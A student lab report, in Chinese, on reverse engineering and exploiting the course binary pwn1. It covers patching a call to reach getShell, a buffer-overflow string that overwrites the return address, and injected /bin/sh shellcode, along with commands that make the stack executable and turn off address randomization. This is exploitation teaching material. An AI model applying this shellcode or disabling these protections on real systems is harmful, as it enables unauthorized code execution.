20164318 毛瀚逸 Exp1 PC平台逆向破解

时间:2021-11-14 17:02:04

一、逆向及Bof基础实践说明

1.1实践目标

  • 本次实践的对象是一个名为pwn1的linux可执行文件。
  • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
  • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 注入一个自己制作的shellcode并运行这段shellcode。

1.2实践内容

  • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 注入一个自己制作的shellcode并运行这段shellcode。
  • 这几种思路,基本代表现实情况中的攻击目标:
  1. 运行原本不可访问的代码片段
  2. 强行修改程序执行流
  3. 以及注入运行任意代码

(注:进行实验前,记得备份Pwn1文件,后续需要使用三次)

1.3基础知识

  1. 掌握NOP,JNE,JE,JMP,CMP汇编指令的机器码

NOP指令:“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。

JNE指令:条件转移指令(等同于“jump not equal”),如果不相等则跳转。

JE指令:条件转移指令,如果相等则跳转。

JMP指令:无条件跳转指令。无条件跳转指令可转到内存中任何程序段。转移地址可在指令中给出,也可以在寄存器中给出,或在存储器中指出。

CMP指令:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,相对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

2.掌握反汇编与十六进制编程器

objdump反汇编命令:

objdump -f test     //显示test的文件头信息
objdump -d test    //反汇编test中的需要执行指令的那些section
objdump -D test    //与-d类似,但反汇编test中的所有section
objdump -h test    //显示test的Section Header信息
objdump -x test    //显示test的全部Header信息
objdump -s test    //除了显示test的全部Header信息,还显示他们对应的十六进制文件代码

xxd命令:

用vi命令打开一个文件,在vi命令模式下输入
:%!xxd            //回车后,该文件会以十六进制形式显示
:%!xxd -r         //参数-r是指将当前的十六进制转换为二进制

二、实验过程

1.1使用objdump -d pwn1命令反汇编

20164318 毛瀚逸 Exp1 PC平台逆向破解

找到相应的main、foo、getshell等字段

20164318 毛瀚逸 Exp1 PC平台逆向破解

此处可以看出80484b5的call调用了位于8048491的foo()函数,e8的作用是跳转,而d7则是相应跳转的地址,那么将d7改为getshell的地址则就可以在程序运行时,触发getshell。

那么d7为补码,逐位取反加一后,变为-29,即可得出地址偏移量,由此得出应该修改的地址为c3

vi pwn1 修改机器指令代码

20164318 毛瀚逸 Exp1 PC平台逆向破解

再使用%!xxd转换为16进制

20164318 毛瀚逸 Exp1 PC平台逆向破解

更改后可得

20164318 毛瀚逸 Exp1 PC平台逆向破解

得到最终效果

20164318 毛瀚逸 Exp1 PC平台逆向破解

2.1通过构造输入参数,造成BOF攻击,改变程序执行流

打开运行后,发现过长的字符会导致出错

20164318 毛瀚逸 Exp1 PC平台逆向破解

通过gdb分析后,发现此处只能有32个字符,那么多的字符呢?

20164318 毛瀚逸 Exp1 PC平台逆向破解

进一步分析,发现eip中对应的ascii码是1234,所以将此处的值修改为getshell的内存地址即可触发。

因此输入11111111222222223333333344444444\x7d\x84\x04\x08即可完成。

20164318 毛瀚逸 Exp1 PC平台逆向破解

3.1注入shellcode并运行

首先用apt-get install execstack安装execstack

然后输入

execstack -s pwn1(设置堆栈可执行)
execstack -q pwn1(查询堆栈是否可执行)
more /proc/sys/kernel/randomize_va_space(查看地址是否随机化,0为否,2为开)
echo "0" > /proc/sys/kernel/randomize_va_space (更改地址不随机化)

more /proc/sys/kernel/randomize_va_space(确认一下)

根据上课内容,我们输入perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

然后我们需要确认变更的地址内容

所以我们继续输入(cat input_shellcode;cat) | ./pwn1(将内容注入)

此时打开另一个终端,输入ps -ef | grep pwn1查询进程号

20164318 毛瀚逸 Exp1 PC平台逆向破解

然后启动gdb调试,并反汇编foo()

20164318 毛瀚逸 Exp1 PC平台逆向破解

在080484ae设置断点,然后在另一个终端触发运行20164318 毛瀚逸 Exp1 PC平台逆向破解

完成。

四、实验心得

这是我们第一次在linux上面操作,和windows图形化的界面不同,kali的操作非常不习惯,但是在同学的指导下也一步步的习惯了。同时对与网络攻防也有了全新的认识,网络攻防是基于各式各样程序、协议的漏洞来“钻空子”,达到正常手段不能获取的信息、权限等等。

五、漏洞的危害

漏洞是指程序、系统、协议等等计算机软件在逻辑、地址分配等等上有缺陷,使攻击者得以利用。